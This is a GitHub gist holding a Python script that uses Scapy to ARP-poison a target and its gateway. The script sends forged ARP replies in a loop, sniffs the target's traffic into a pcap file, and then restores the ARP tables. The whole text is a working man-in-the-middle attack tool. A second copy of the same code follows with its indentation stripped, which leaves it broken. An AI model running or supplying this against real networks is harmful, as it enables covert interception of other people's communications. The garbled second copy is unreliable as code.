juliosmelo/gist:d1f6a0dccf9be4428dca855c185e6367

## gistfile1.txt
import os
import sys
import threading
import signal
from scapy.all import *


HWDST_SRC = "ff:ff:ff:ff:ff:ff"
interface = ""
target_ip = ""
gateway_ip = ""
packet_count = 1000

verbosity = False
iface = interface


def get_mac(ip_address):
    responses, unanswered = srp(Ether(dst=HWDST_SRC)/ARP(pdst=ip_address), timeout=2, retry=100)
    for s,r in responses:
        return r[Ether].src
    return

def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    poison_target = ARP()
    poison_target.op = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print(f"[*] Beginning the ARP poison. [CTRL-C to stop]")

    while True:
        try:
            send(poison_target)
            send(poison_gateway)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    print("[*] ARP poison attack finished")
    return

def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    print(f"[*] Restoring target {target_ip}")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=HWDST_SRC, hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=HWDST_SRC, hwsrc=target_mac), count=5)
    os.kill(os.getpid(), signal.SIGINT)
    return

print(f"[*] Setting up {interface}")
gateway_mac = get_mac(gateway_ip)
target_mac = get_mac(target_ip)

if gateway_mac == None:
    print(f"[!!!] Failed to get gateway MAC. Exiting")
    sys.exit(0)

if target_mac == None:
    print(f"[!!!] Failed to get target MAC. Exiting")
    sys.exit(0)

print(f"[*] Gateway {gateway_ip} is at {gateway_mac}")
print(f"[*] Target {target_ip} is at {target_mac}")

# start poisoning thread
poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print(f"[*] Starting sniffer for {packet_count}")
    bpf_filter = f"ip host {target_ip}"
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap('arper.pcap', packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit()
	import os
	import sys
	import threading
	import signal
	from scapy.all import *


	HWDST_SRC = "ff:ff:ff:ff:ff:ff"
	interface = ""
	target_ip = ""
	gateway_ip = ""
	packet_count = 1000

	verbosity = False
	iface = interface


	def get_mac(ip_address):
	responses, unanswered = srp(Ether(dst=HWDST_SRC)/ARP(pdst=ip_address), timeout=2, retry=100)
	for s,r in responses:
	return r[Ether].src
	return

	def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
	poison_target = ARP()
	poison_target.op = 2
	poison_target.psrc = gateway_ip
	poison_target.pdst = target_ip
	poison_target.hwdst = target_mac

	poison_gateway = ARP()
	poison_gateway.op = 2
	poison_gateway.psrc = target_ip
	poison_gateway.pdst = gateway_ip
	poison_gateway.hwdst = gateway_mac

	print(f"[*] Beginning the ARP poison. [CTRL-C to stop]")

	while True:
	try:
	send(poison_target)
	send(poison_gateway)
	except KeyboardInterrupt:
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
	print("[*] ARP poison attack finished")
	return

	def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
	print(f"[*] Restoring target {target_ip}")
	send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=HWDST_SRC, hwsrc=gateway_mac), count=5)
	send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=HWDST_SRC, hwsrc=target_mac), count=5)
	os.kill(os.getpid(), signal.SIGINT)
	return

	print(f"[*] Setting up {interface}")
	gateway_mac = get_mac(gateway_ip)
	target_mac = get_mac(target_ip)

	if gateway_mac == None:
	print(f"[!!!] Failed to get gateway MAC. Exiting")
	sys.exit(0)

	if target_mac == None:
	print(f"[!!!] Failed to get target MAC. Exiting")
	sys.exit(0)

	print(f"[*] Gateway {gateway_ip} is at {gateway_mac}")
	print(f"[*] Target {target_ip} is at {target_mac}")

	# start poisoning thread
	poison_thread = threading.Thread(target = poison_target, args = (gateway_ip, gateway_mac, target_ip, target_mac))
	poison_thread.start()

	try:
	print(f"[*] Starting sniffer for {packet_count}")
	bpf_filter = f"ip host {target_ip}"
	packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
	wrpcap('arper.pcap', packets)
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
	except KeyboardInterrupt:
	restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
	sys.exit()